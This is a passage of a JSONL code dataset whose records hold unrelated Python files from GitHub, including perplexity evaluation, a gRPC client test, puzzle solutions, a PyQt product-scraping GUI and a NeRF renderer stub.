self.tracked_obj\n","repo_name":"andresprados/SPIGA","sub_path":"spiga/demo/analyze/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":212,"dataset":"github-code","pt":"61"} +{"seq_id":"37269343583","text":"import numpy as np\nfrom PIL import ImageQt, Image\nfrom PySide6.QtGui import QPixmap\n\n\ndef get_triangle_img_wo_border(\n mask: np.ndarray, qpixmap: QPixmap,\n value_zero_zone=0, channels_count=4) -> QPixmap:\n image = qpixmap.toImage()\n b = image.bits()\n arr = np.frombuffer(b, np.uint8).reshape(mask.shape[0], mask.shape[1], channels_count)\n arr *= np.expand_dims((mask == value_zero_zone), axis=-1)\n arr = np.stack([arr[..., 2], arr[..., 1], arr[..., 0], arr[..., -1]], axis=-1)\n return QPixmap(ImageQt.ImageQt(Image.fromarray(arr)))\n","repo_name":"TaplierShiru/QtPuzzleGame","sub_path":"puzzle/utils/image_cutter_tools/img2img_wo_borders.py","file_name":"img2img_wo_borders.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23463537411","text":"def readTestset(testset):\r\n fo = open(testset,'r+')\r\n line = fo.readline()\r\n testCases = int(line)\r\n print(\"test cases:\\t\", testCases)\r\n infoList = []\r\n for i in range(testCases):\r\n line = fo.readline()\r\n infoList.append(line.split())\r\n return infoList\r\n\r\n\r\ninfoList = readTestset('D-small-attempt2.in')\r\nprint(infoList)\r\n\r\ndef solveOneLine(lineList):\r\n x = int(lineList[0])\r\n r = int(lineList[1])\r\n c = int(lineList[2])\r\n\r\n maxRC = max(r,c)\r\n minRC = min(r,c)\r\n\r\n if (x > maxRC) or ((r*c)%x != 0) or (x >= (2*minRC + 1)) or (x >= 7) or (x > 3 and minRC == 2):\r\n return \"RICHARD\"\r\n else:\r\n return \"GABRIEL\"\r\n \r\nf = open('result','w')\r\nfor i in range(len(infoList)):\r\n f.write(\"Case #\")\r\n f.write(str(i+1))\r\n f.write(\": \")\r\n f.write(str(solveOneLine(infoList[i])))\r\n f.write('\\n')\r\n\r\nprint(\"closing\")\r\nf.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_158/1013.py","file_name":"1013.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1021884237","text":"\"\"\"Evaluate's perplexity but we pass in the model and tokenizer\"\"\"\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom evaluate import logging\nfrom torch.nn import CrossEntropyLoss\nfrom tqdm import tqdm\n\n\ndef eval_perplexity(\n predictions,\n model,\n tokenizer,\n batch_size: int = 16,\n add_start_token: bool = True,\n device=None,\n max_length=None,\n):\n if device is not None:\n assert device in [\n \"gpu\",\n \"cpu\",\n \"cuda\",\n ], \"device should be either gpu or cpu.\"\n if device == \"gpu\":\n device = \"cuda\"\n else:\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n # if batch_size > 1 (which generally leads to padding being required), and\n # if there is not an already assigned pad_token, assign an existing\n # special token to also be the padding token\n if tokenizer.pad_token is None and batch_size > 1:\n existing_special_tokens = list(tokenizer.special_tokens_map_extended.values())\n # check that the model already has at least one special token defined\n assert (\n len(existing_special_tokens) > 0\n ), \"If batch_size > 1, model must have at least one special token to use for padding. Please use a different model or set batch_size=1.\"\n # assign one of the special tokens to also be the pad token\n tokenizer.add_special_tokens({\"pad_token\": existing_special_tokens[0]})\n\n if add_start_token and max_length:\n # leave room for <BOS> token to be added:\n assert (\n tokenizer.bos_token is not None\n ), \"Input model must already have a BOS token if using add_start_token=True. Please use a different model, or set add_start_token=False\"\n max_tokenized_len = max_length - 1\n else:\n max_tokenized_len = max_length\n\n encodings = tokenizer(\n predictions,\n add_special_tokens=False,\n padding=True,\n truncation=True if max_tokenized_len else False,\n max_length=max_tokenized_len,\n return_tensors=\"pt\",\n return_attention_mask=True,\n ).to(device)\n\n encoded_texts = encodings[\"input_ids\"]\n attn_masks = encodings[\"attention_mask\"]\n\n # check that each input is long enough:\n if add_start_token:\n assert torch.all(\n torch.ge(attn_masks.sum(1), 1)\n ), \"Each input text must be at least one token long.\"\n else:\n assert torch.all(\n torch.ge(attn_masks.sum(1), 2)\n ), \"When add_start_token=False, each input text must be at least two tokens long. Run with add_start_token=True if inputting strings of only one token, and remove all empty input strings.\"\n\n ppls = []\n loss_fct = CrossEntropyLoss(reduction=\"none\")\n\n for start_index in logging.tqdm(range(0, len(encoded_texts), batch_size)):\n end_index = min(start_index + batch_size, len(encoded_texts))\n encoded_batch = encoded_texts[start_index:end_index]\n attn_mask = attn_masks[start_index:end_index]\n\n if add_start_token:\n bos_tokens_tensor = torch.tensor(\n [[tokenizer.bos_token_id]] * encoded_batch.size(dim=0)\n ).to(device)\n encoded_batch = torch.cat([bos_tokens_tensor, encoded_batch], dim=1)\n attn_mask = torch.cat(\n [\n torch.ones(bos_tokens_tensor.size(), dtype=torch.int64).to(device),\n attn_mask,\n ],\n dim=1,\n )\n\n labels = encoded_batch\n\n with torch.no_grad():\n out_logits = model(encoded_batch, attention_mask=attn_mask).logits\n\n shift_logits = out_logits[..., :-1, :].contiguous()\n shift_labels = labels[..., 1:].contiguous()\n shift_attention_mask_batch = attn_mask[..., 1:].contiguous()\n\n perplexity_batch = torch.exp(\n (\n loss_fct(shift_logits.transpose(1, 2), shift_labels)\n * shift_attention_mask_batch\n ).sum(1)\n / shift_attention_mask_batch.sum(1)\n )\n\n ppls += perplexity_batch.tolist()\n\n return np.mean(ppls)\n # return {\"perplexities\": ppls, \"mean_perplexity\": np.mean(ppls)}\n\n\ndef batched_perplexity(texts, model, tokenizer, batch_size, max_length, stride):\n device = model.device\n tokenized_inputs = tokenizer(texts, truncation=False)[\"input_ids\"]\n all_token_ids = []\n for tokenized_input in tokenized_inputs:\n all_token_ids.extend(tokenized_input + [tokenizer.eos_token_id])\n\n text_len = len(all_token_ids)\n token_ids = torch.LongTensor(all_token_ids)\n lls = []\n n_samples = 0\n\n for i in tqdm(range(0, text_len, batch_size * stride)):\n begin_locs, end_locs, trg_lens = [], [], []\n for j in range(batch_size):\n j = i + j * stride\n if j >= text_len:\n break\n begin_loc = max(j + stride - max_length, 0)\n end_loc = min(j + stride, text_len)\n trg_len = end_loc - j # may be different from stride on last loop\n\n begin_locs.append(begin_loc)\n end_locs.append(end_loc)\n trg_lens.append(trg_len)\n\n input_ids = [token_ids[b:e] for b, e in zip(begin_locs, end_locs)]\n target_end_locs = [sen.size(0) for sen in input_ids]\n input_ids = [\n F.pad(sen, (0, max_length - sen.size(0)), \"constant\", 0)\n for sen in input_ids\n ] # we dont need attention mask as long as these padded token is not involved in loss calculation\n input_ids = torch.stack(input_ids, dim=0).to(device)\n\n target_ids = (\n torch.ones_like(input_ids) * -100\n ) # -100 is the default ingore_index value in torch.nn.CrossEntropyLoss\n for index, (b, e) in enumerate(zip(trg_lens, target_end_locs)):\n labels = input_ids[index, -b:e].clone()\n target_ids[index, -b:e] = labels\n\n with torch.no_grad():\n outputs = model(input_ids, labels=target_ids)\n log_likelihood = outputs.loss * sum(trg_lens)\n\n n_samples += input_ids.size(0)\n lls.append(log_likelihood)\n\n ppl = torch.exp(torch.stack(lls).sum() / end_locs[-1])\n return ppl\n\n\ndef unbatched_perplexity(texts, model, tokenizer, max_length, stride):\n tokenized_inputs = tokenizer(texts, truncation=False)[\"input_ids\"]\n all_token_ids = []\n for tokenized_input in tokenized_inputs:\n all_token_ids.extend(tokenized_input + [tokenizer.eos_token_id])\n\n token_ids = torch.LongTensor(all_token_ids)\n\n seq_len = len(token_ids)\n\n nlls = []\n prev_end_loc = 0\n for begin_loc in tqdm(range(0, seq_len, stride)):\n end_loc = min(begin_loc + max_length, seq_len)\n trg_len = end_loc - prev_end_loc # may be different from stride on last loop\n input_ids = token_ids[begin_loc:end_loc].unsqueeze(0).to(\"cuda\")\n target_ids = input_ids.clone()\n target_ids[:, :-trg_len] = -100\n\n with torch.no_grad():\n outputs = model(input_ids, labels=target_ids)\n\n # loss is calculated using CrossEntropyLoss which averages over valid labels\n # N.B. the model only calculates loss over trg_len - 1 labels, because it internally shifts the labels\n # to the left by 1.\n neg_log_likelihood = outputs.loss\n\n nlls.append(neg_log_likelihood)\n\n prev_end_loc = end_loc\n if end_loc == seq_len:\n break\n\n ppl = torch.exp(torch.stack(nlls).mean())\n\n return ppl\n","repo_name":"mnoukhov/elastic-reset","sub_path":"stackllama/perplexity.py","file_name":"perplexity.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13035612403","text":"import concurrent\n\nimport grpc\nimport pytest\n\nimport bosdyn.client.auto_return\nfrom bosdyn.api.auto_return import auto_return_pb2, auto_return_service_pb2_grpc\n\nfrom . import helpers\n\n\nclass MockAutoReturnServicer(auto_return_service_pb2_grpc.AutoReturnServiceServicer):\n\n def __init__(self):\n super(MockAutoReturnServicer, self).__init__()\n self.active_configuration_request = None\n self.leases = None\n\n def GetConfiguration(self, request, context):\n response = auto_return_pb2.GetConfigurationResponse()\n helpers.add_common_header(response, request)\n if self.active_configuration_request:\n response.request.CopyFrom(self.active_configuration_request)\n response.enabled = True\n return response\n\n def Configure(self, request, context):\n response = auto_return_pb2.ConfigureResponse()\n helpers.add_common_header(response, request)\n if request.params.max_displacement <= 0:\n response.invalid_params.max_displacement = request.params.max_displacement\n response.status = auto_return_pb2.ConfigureResponse.STATUS_INVALID_PARAMS\n else:\n response.status = auto_return_pb2.ConfigureResponse.STATUS_OK\n self.active_configuration_request = request\n self.leases = request.leases\n return response\n\n\n@pytest.fixture(scope='function')\ndef client():\n return bosdyn.client.auto_return.AutoReturnClient()\n\n\n@pytest.fixture(scope='function')\ndef service():\n return MockAutoReturnServicer()\n\n\n@pytest.fixture(scope='function')\ndef server(client, service):\n server = grpc.server(concurrent.futures.ThreadPoolExecutor(max_workers=1))\n auto_return_service_pb2_grpc.add_AutoReturnServiceServicer_to_server(service, server)\n port = server.add_insecure_port('localhost:0')\n channel = grpc.insecure_channel('localhost:{}'.format(port))\n client.channel = channel\n server.start()\n return server\n\n\ndef test_simple(client, server, service):\n \"\"\"Test basic usage of the client.\"\"\"\n client.get_configuration()\n resp = client.get_configuration_async().result()\n assert not resp.enabled\n assert not resp.HasField('request')\n\n params = auto_return_pb2.Params()\n params.max_displacement = -1\n with pytest.raises(bosdyn.client.auto_return.InvalidParameterError):\n client.configure(params, leases=[])\n with pytest.raises(bosdyn.client.auto_return.InvalidParameterError):\n client.configure_async(params, leases=[])\n\n params.max_displacement = 12\n client.configure(params, leases=[])\n assert service.active_configuration_request.params.SerializeToString(\n ) == params.SerializeToString()\n # Test that the NoneType was overwritten with an iterable.\n assert len(service.leases) == 0\n\n resp = client.get_configuration()\n assert resp.request.params.SerializeToString() == params.SerializeToString()\n","repo_name":"boston-dynamics/spot-sdk","sub_path":"python/bosdyn-client/tests/test_auto_return_client.py","file_name":"test_auto_return_client.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":2148,"dataset":"github-code","pt":"61"} +{"seq_id":"34290878813","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Aug 15 00:57:25 2021\r\n\r\n@author: Daneshjoei\r\n\"\"\"\r\n\"\"\"example 92:\r\n A number chain is created by continuously \r\n adding the square of the digits in a number\r\n to form a new number until it has been seen before.\r\n\r\n For example,\r\n\r\n 44 → 32 → 13 → 10 → 1 → 1\r\n 85 → 89 → 145 → 42 → 20 → 4 → 16 → 37 → 58 → 89\r\n\r\n Therefore any chain that arrives at 1 or 89 will\r\n become stuck in an endless loop. What is most \r\n amazing is that EVERY starting number will \r\n eventually arrive at 1 or 89.\r\n\r\n How many starting numbers below ten million will \r\n arrive at 89?\r\n\"\"\"\r\n#function gives the above process for one number\r\ndef SumOfSquareDigits(Num):\r\n while True:\r\n Sum=0\r\n Num_str=str(Num)\r\n for i in Num_str:\r\n Sum+=int(i)**2\r\n if Sum==89:\r\n return True\r\n if Sum==1:\r\n return False\r\n Num=Sum\r\n\r\n#test: print (s(44))\r\n\r\ncounter=0 \r\nfor i in range(2,10000000):\r\n if SumOfSquareDigits(i):\r\n counter+=1\r\nprint (counter)\r\n ","repo_name":"mehrad31415/Project-Euler","sub_path":"ex_92.py","file_name":"ex_92.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37659380141","text":"#Kushendra and Shulamit worked on this\n\nimport random\n\ndef build_random_list(size, max_value):\n l = []\n i= 0\n while i < size:\n l.append(random.randrange(0,max_value))\n i = i+1\n return l\n\ndef largest(l, max):\n print(l)\n i = 0\n while i < len(l):\n if l[i] == max:\n return i\n else:\n i +=1\nprint(largest(build_random_list(15,11), 10))\n\ne = build_random_list(15,10)\ndef freq(l, value):\n count = 0\n for item in l:\n if item == value:\n count +=1\n else:\n pass\n return count\n\nprint(e)\nprint(freq(build_random_list(15,10), 7))\n\nf = build_random_list(30,16)\ndef mode(l):\n s = 0\n final_mode = 0\n for i in l:\n mode = freq(l, i)\n if mode >= s:\n s = mode\n final_mode = i\n return final_mode\n \nprint(f)\nprint(mode(f))\n","repo_name":"Kushendra1/csci127-assignments","sub_path":"hw_06/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18599425549","text":"import sys\n\nT=int(sys.stdin.readline())\n\n\n\ndef result(case):\n mother=max(case[0],case[1])\n child=min(case[0],case[1])\n differ=mother%child\n if mother==case[0]:\n answer_mother=case[2]\n answer_child=case[3]\n else:\n answer_mother=case[3]\n answer_child=case[2]\n if answer_mother>child:\n start=answer_mother-child\n else:\n start=answer_mother\n visited={}\n #print(\"start={}\".format(start))\n for i in range(child):\n if (start+(i*differ))%child in visited:\n break;\n visited[(start+(i*differ))%child]=i\n #print(visited)\n if answer_child%child not in visited:\n return -1\n #print(visited)\n answer=mother*visited[answer_child%child]+answer_mother\n return answer\n\n\n\nfor i in range(T):\n case=list(map(int,sys.stdin.readline().rstrip().split(\" \")))\n print(result(case))\n\n\n\n\n","repo_name":"Andrevile/Algorithm","sub_path":"BOJ PS/No.6064 카잉달력.py","file_name":"No.6064 카잉달력.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71305079236","text":"import sys\nfrom PyQt6.QtCore import QObject, QThread, pyqtSignal, pyqtSlot\nimport logging\nimport traceback \n\n\nfrom PyQt6.QtWidgets import (\n QApplication,\n QGridLayout,\n QPushButton,\n QWidget,\n QVBoxLayout,\n QCheckBox,\n QHBoxLayout,\n QMessageBox,\n QGroupBox,\n QComboBox,\n QLabel,\n QProgressBar,\n QPlainTextEdit,\n QLineEdit,\n QFileDialog,\n)\n\nfrom ffscrapper.ui_options import generate_breadth_search_options\nfrom scrapper import Scrapper\n\nlogging.basicConfig(filename=\"debug.log\", level=logging.DEBUG)\n\n\nclass Worker(QObject):\n finished = pyqtSignal()\n progress = pyqtSignal(int)\n warningText = pyqtSignal(str)\n enableButton = pyqtSignal(bool)\n\n def __init__(self, scrapper, message_function, app):\n super().__init__()\n self.scrapper = scrapper\n self.message_function = message_function\n self.app = app\n\n def run(self):\n try:\n self.scrapper.scrape()\n self.enableButton.emit(True)\n except:\n logging.error(\"Klaida:\" + str(sys.exc_info()))\n traceback.print_exc() \n self.app.analyse.setEnabled(True)\n self.warningText.emit(\"Programoje įvyko klaida!\")\n\n\nclass Signaller(QObject):\n signal = pyqtSignal(str)\n\n\nclass QTextEditLogger(logging.Handler):\n def __init__(self, parent, slotfunc):\n super().__init__()\n self.widget = QPlainTextEdit(parent)\n self.widget.setReadOnly(True)\n self.signaller = Signaller()\n self.signaller.signal.connect(slotfunc)\n\n def emit(self, record):\n msg = self.format(record)\n # thread safe\n self.signaller.signal.emit(msg)\n\n\nclass App(QWidget):\n def createLayoutForTables(self, outerUpperLayout):\n groupbox = QGroupBox(\"Lentelės\")\n outerUpperLayout.addWidget(groupbox, 0, 0)\n fileSelectLayout = QVBoxLayout()\n\n groupbox.setLayout(fileSelectLayout)\n # Store ids\n btn = QPushButton(\"Parduotuvių lentelė\")\n btn.clicked.connect(self.getFileForStoreIds)\n fileSelectLayout.addWidget(btn)\n\n # FF table\n btn = QPushButton(\"FF produktų lentelė\")\n btn.clicked.connect(self.getFileForFFProducts)\n fileSelectLayout.addWidget(btn)\n\n # Producs\n btn = QPushButton(\"Produktų lentelė\")\n btn.clicked.connect(self.getFileForProducts)\n fileSelectLayout.addWidget(btn)\n\n # FF Price\n btn = QPushButton(\"FF kainodaros lentelė\")\n btn.clicked.connect(self.getFileForFFPrice)\n fileSelectLayout.addWidget(btn)\n\n e1 = QLineEdit()\n fileSelectLayout.addWidget(e1)\n self.designer_id = e1\n\n def createLayoutForAdditionalOptions(self, outerUpperLayout):\n groupbox = QGroupBox(\"Papildomi nustatymai\")\n outerUpperLayout.addWidget(groupbox, 0, 1)\n\n optionsLayout = QVBoxLayout()\n groupbox.setLayout(optionsLayout)\n\n for option_id, widget in self.extra_options.items():\n optionsLayout.addWidget(widget)\n\n boxLayout = QHBoxLayout()\n optionsLayout.addLayout(boxLayout)\n\n boxLayout.addWidget(QLabel(\"Regionas\"))\n boxLayout.addWidget(self.region_select_combo_box)\n\n def createOutputTableLayout(self, outerUpperLayout):\n groupbox = QGroupBox(\"Analizės rezultatai\")\n outerUpperLayout.addWidget(groupbox, 0, 2)\n fileSelectLayout = QVBoxLayout()\n\n groupbox.setLayout(fileSelectLayout)\n btn = QPushButton(\"Pagrindinė lentelė\")\n btn.clicked.connect(self.getFileForSaveMainTable)\n fileSelectLayout.addWidget(btn)\n\n def createLayoutForCheckboxes(self, outerUpperLayout):\n groupbox = QGroupBox(\"Analizės apimtis\")\n outerUpperLayout.addWidget(groupbox, 1, 0, 1, 3)\n\n horizontalBox = QHBoxLayout()\n groupbox.setLayout(horizontalBox)\n\n menOptionsLayout = QVBoxLayout()\n\n for option_id, widget in self.scrape_breadth_options.items():\n if option_id.startswith(\"men\"):\n menOptionsLayout.addWidget(widget[\"checkbox\"])\n\n horizontalBox.addLayout(menOptionsLayout)\n\n womensOptionsLayout = QVBoxLayout()\n\n for option_id, widget in self.scrape_breadth_options.items():\n if option_id.startswith(\"women\"):\n womensOptionsLayout.addWidget(widget[\"checkbox\"])\n\n horizontalBox.addLayout(womensOptionsLayout)\n\n kids = QVBoxLayout()\n\n for option_id, widget in self.scrape_breadth_options.items():\n if not option_id.startswith(\"women\") and not option_id.startswith(\"men\"):\n kids.addWidget(widget[\"checkbox\"])\n\n horizontalBox.addLayout(kids)\n\n def addUpperUIPortion(self):\n outerUpperLayout = QGridLayout()\n self.createLayoutForTables(outerUpperLayout)\n self.createLayoutForAdditionalOptions(outerUpperLayout)\n self.createOutputTableLayout(outerUpperLayout)\n self.createLayoutForCheckboxes(outerUpperLayout)\n\n # start scrapping button\n self.analyse.clicked.connect(self.scrape)\n outerUpperLayout.addWidget(self.analyse, 2, 0, 2, 3)\n\n return outerUpperLayout\n\n def addLowerUIPortion(self):\n outerDownLayout = QGridLayout()\n outerDownLayout.addWidget(self.progress_bar)\n\n self.logTextBox = QTextEditLogger(self, self.update_status)\n self.logTextBox.setFormatter(\n logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n )\n logging.getLogger().addHandler(self.logTextBox)\n logging.getLogger().setLevel(logging.DEBUG)\n\n outerDownLayout.addWidget(self.logTextBox.widget)\n return outerDownLayout\n\n def __init__(self):\n super().__init__()\n # self.thread = QThread()\n self.title = \"FF Produktų analizė\"\n self.left = 10\n self.top = 10\n self.width = 2000\n self.height = 480\n\n self.products_from_ff_table = \"\"\n self.store_ids_table = \"\"\n self.products_table = \"\"\n self.ff_price_table = \"\"\n self.designer_id = None\n\n self.main_table_save_path = \"\"\n self.quantity_table_save_path = \"\"\n\n self.scrape_breadth_options = generate_breadth_search_options()\n\n self.region_select_combo_box = QComboBox()\n self.region_select_combo_box.addItems(\n [\"de\", \"ru\", \"lt\", \"pl\", \"uk\", \"lv\", \"ee\", \"it\"]\n )\n\n self.extra_options = {}\n self.extra_options[\"add_images\"] = QCheckBox(\"Pridėti paveiksliukus\")\n\n self.analyse = QPushButton(\"Analizuoti\")\n\n self.progress_bar = QProgressBar()\n self.progress_bar.setValue(0)\n self.progress_bar.setMinimum(0)\n self.progress_bar.setMaximum(100)\n\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n\n super().__init__()\n\n outerUpperLayout = self.addUpperUIPortion()\n outerDownLayout = self.addLowerUIPortion()\n\n outerLayout = QGridLayout()\n outerLayout.addLayout(outerUpperLayout, 0, 0)\n outerLayout.addLayout(outerDownLayout, 1, 0)\n self.setLayout(outerLayout)\n\n self.show()\n\n def getFileForStoreIds(self):\n self.store_ids_table = self.getFileName()\n\n def getFileForFFProducts(self):\n self.products_from_ff_table = self.getFileName()\n\n def getFileForProducts(self):\n self.products_table = self.getFileName()\n\n def getFileForFFPrice(self):\n self.ff_price_table = self.getFileName()\n\n def getFileName(self):\n file_filter = \"Excel File (*.xlsx *.xls *.csv)\"\n response = QFileDialog.getOpenFileName(\n parent=self,\n caption=\"Pasirinkite reikiamą lentelę\",\n filter=file_filter,\n initialFilter=\"Excel File (*.xlsx *.xls)\",\n )\n return response[0]\n\n def getFileForSaveMainTable(self):\n self.main_table_save_path = self.saveFileDialog()\n\n def getFileForSaveQuantityTable(self):\n self.quantity_table_save_path = self.saveFileDialog()\n\n def saveFileDialog(self):\n # options = QFileDialog.options()\n # options = QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getSaveFileName(\n self, \"QFileDialog.getSaveFileName()\", \"\", \"Excel File (*.xlsx)\"\n )\n if fileName:\n return fileName\n\n def scrape(self):\n if not self.store_ids_table:\n self.displayMessage(\"Error\", \"Pasirinkite parduotuvių lentelę\")\n return\n\n if not self.products_from_ff_table:\n self.displayMessage(\"Error\", \"Pasirinkite FF produktų lentelę\")\n return\n\n if not self.products_table:\n self.displayMessage(\"Error\", \"Pasirinkite produktų lentelę\")\n return\n\n if not self.ff_price_table:\n self.displayMessage(\"Error\", \"Pasirinkite FF kainodaros lentelę\")\n return\n\n if not self.main_table_save_path:\n self.displayMessage(\"Error\", \"Pasirinkite rezultatų lentelę\")\n return\n\n logging.info(\"Start\")\n logging.info(\"Store ids table: %s\", self.store_ids_table)\n logging.info(\"Products from ff table: %s\", self.products_from_ff_table)\n logging.info(\"Products table: %s\", self.products_table)\n logging.info(\"Rez table: %s\", self.main_table_save_path)\n logging.info(\"Region: %s\", self.region_select_combo_box.currentText())\n\n category_ids = [\n option[\"category_id\"]\n for option in self.scrape_breadth_options.values()\n if option[\"checkbox\"].isChecked()\n ]\n\n scrapper = Scrapper(\n store_ids_table=self.store_ids_table,\n products_table=self.products_table,\n products_from_ff_table=self.products_from_ff_table,\n ff_price_table=self.ff_price_table,\n main_table_save_path=self.main_table_save_path,\n quantity_table_save_path=self.quantity_table_save_path,\n categories_to_scrape=category_ids,\n scrape_quantity=True,\n add_images=self.extra_options[\"add_images\"].isChecked(),\n region=self.region_select_combo_box.currentText(),\n progress_bar_update_func=self.updateProgressBar,\n designer_id=self.designer_id.text(),\n )\n\n self.thread = QThread(parent=self)\n self.worker = Worker(scrapper, self.displayMessage, self)\n self.worker.moveToThread(self.thread)\n self.thread.started.connect(self.worker.run)\n self.worker.finished.connect(self.thread.quit)\n self.worker.finished.connect(self.worker.deleteLater)\n self.worker.warningText.connect(self._handleWarningText)\n self.worker.enableButton.connect(self._handleEnableButton)\n self.thread.finished.connect(self.thread.deleteLater)\n self.thread.start()\n\n # Final resets\n self.analyse.setEnabled(False)\n\n self.thread.finished.connect(\n lambda: self.stepLabel.setText(\"Long-Running Step: 0\")\n )\n\n def _handleWarningText(self, message):\n self.displayMessage(\"Error\", message)\n\n def _handleEnableButton(self, enabled):\n self.analyse.setEnabled(enabled)\n\n @pyqtSlot(str)\n def update_status(self, message):\n self.logTextBox.widget.appendPlainText(message)\n\n def displayMessage(self, status, message):\n QMessageBox.about(self, status, message)\n\n def updateProgressBar(self, value):\n self.progress_bar.setValue(value)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec())\n","repo_name":"lavinski/FFScrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41255692243","text":"import os\n\n\ndef count_words(word, file_name):\n try:\n with open(file_name, encoding='UTF-8') as file_object:\n lines = file_object.readlines()\n except FileNotFoundError:\n print(\"你好,文件\" + file_name + \"不存在于当前目录。\")\n else:\n num_of_word = 0\n for line in lines:\n num_of_word = line.lower().count(word) + num_of_word\n return num_of_word\n\n\npath = os.getcwd() + \"\\\\book\\\\\"\nfile_list = os.listdir(path)\nfor file in file_list:\n num = count_words(\"the\", path + file)\n print(\"文件\"+file+\"中有单词‘the’\"+str(num)+\"个。\")","repo_name":"JaeZheng/learn_python","sub_path":"10/10-10.py","file_name":"10-10.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71443083073","text":"import pandas as pd\nimport os\nimport sys\n\n# If you want to group all CSV files that were downloaded by the tool, you can use this script\n# You need to copy this file to the folder where the tweets were downloaded and run it passing \n# as parameter the output filename: python group_tweets.py output.csv\n\nif len(sys.argv) == 1:\n raise Exception(\"Please, provide the output filename, e.g.: python group_tweets.py output.csv\")\n\ndf = pd.DataFrame()\nsep = '|'\n\nfor filename in os.listdir():\n if '.csv' in filename:\n temp_df = pd.read_csv(filename, sep=sep)\n\n df = pd.concat([df, temp_df])\n\ndf.sort_values(by='created_at', inplace=True)\n\nfilter_columns = {'lang':'en'}\n\nif filter_columns:\n for column in filter_columns:\n df = df[df[column] == filter_columns[column]]\n\ndf.to_csv(sys.argv[1], sep=sep)","repo_name":"GutoL/tweets_downloader","sub_path":"group_tweets.py","file_name":"group_tweets.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27159366009","text":"from configparser import ConfigParser\n\nimport torch\nimport torch.nn as nn\n\nfrom sample_ray import RaySamplerBox, RaySamplerNearFar\nfrom .nerf_network import NeRFNetwork\nfrom utils import logger\n\nlogger = logger.Logger(\"model/renderer\")\n\nclass Renderer(nn.Module):\n def __init__(self, config: ConfigParser):\n super(Renderer, self).__init__()\n\n self.num_coarse_sample = config.getint(\"model\", \"num_coarse_sample\")\n self.num_fine_sample = config.getint(\"model\", \"num_fine_sample\")\n self.sample_method = config.get(\"model\", \"sample_method\")\n\n #* NeRF, representing the scene as an MLP\n self.scene_net_coarse = NeRFNetwork(config)\n if config.getbool(\"model\", \"use_same_scene_net\"):\n self.scene_net_fine = self.scene_net_coarse\n else:\n self.scene_net_fine = NeRFNetwork(config)\n\n #* Ray sampling in coarse stage\n self.sample_method = config.get(\"model\", \"sample_method\")\n if self.sample_method == \"bbox\":\n self.ray_sampler = RaySamplerBox(self.num_coarse_sample)\n elif self.sample_method == \"near_far\":\n self.ray_sampler = RaySamplerNearFar(self.num_coarse_sample)\n else:\n raise ValueError(\"Wrong sample method, got {}.\".format(sample_method))\n\n #* Volumn rendering\n self.volumn_renderer = VolumeRenderer(config)\n\n def forward(self,):\n pass","repo_name":"ZhaoOfficial/CG","sub_path":"Neural Radiance Field/model/networks/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22487062036","text":"##Tarea 24\n\n\n##función que convierte el número decimal en binario\ndef convierte_binario(decimalAconvertir):\n\t##creamos una lista para ir añadiendo los códigos binarios\n\tnumBinario= []\n\t##creamos una cadena donde neteremos el código binario resultante y será el valor que devuelva la función.\n\tcadenaBinaria = \"\"\n\t##asignamos el numero a convertir a la variable cociente\n\tcociente = decimalAconvertir\n\t##creamos una variable resto par albergar el resultado de la operación resto\n\tresto = 0\n\n\t##mediante un bucle vamos dividiendo el número a convertir entre 2 guardando el resto, el bucle se ejecutará mientras el número resultante se pueda dividir entre 2, es decir, mientras sea mayir que 1 \n\twhile cociente>1:\n\t\tresto = cociente%2\n\t\tcociente = cociente//2\n\t\t##añadimos el resto a la lista\n\t\tnumBinario.append(resto)\n\t\t\n\t#una vez terminada la ejecución del bucle añadimos el cociente que haya quedado\n\tnumBinario.append(cociente)\n\t##damos la vuelta a la lista para tener el código binario en el orden correcto\n\tnumBinario.reverse()\n\t##fomamos una cadean con los elementos de la lista, esta cadena será el resultado de la función\n\tfor n in numBinario:\n\t\tcadenaBinaria = cadenaBinaria + str(n)\n\treturn cadenaBinaria\n\n\nconvertir = \"S\"\n##mediante un bucle posibilitamos al usuario que pueda convertir más de un número digital \nwhile convertir == \"S\" or convertir == \"s\":\n\t##Pedimos al usuario que meta el número decimal a convertir\n\tnumeroDecimal = input(\"Introduce un nº decimal: \")\n\n\t#Comprobamos que el valor introducido es un número, en caso de que no lo sea seguirá pidiendo input hasta que el usuario meta un 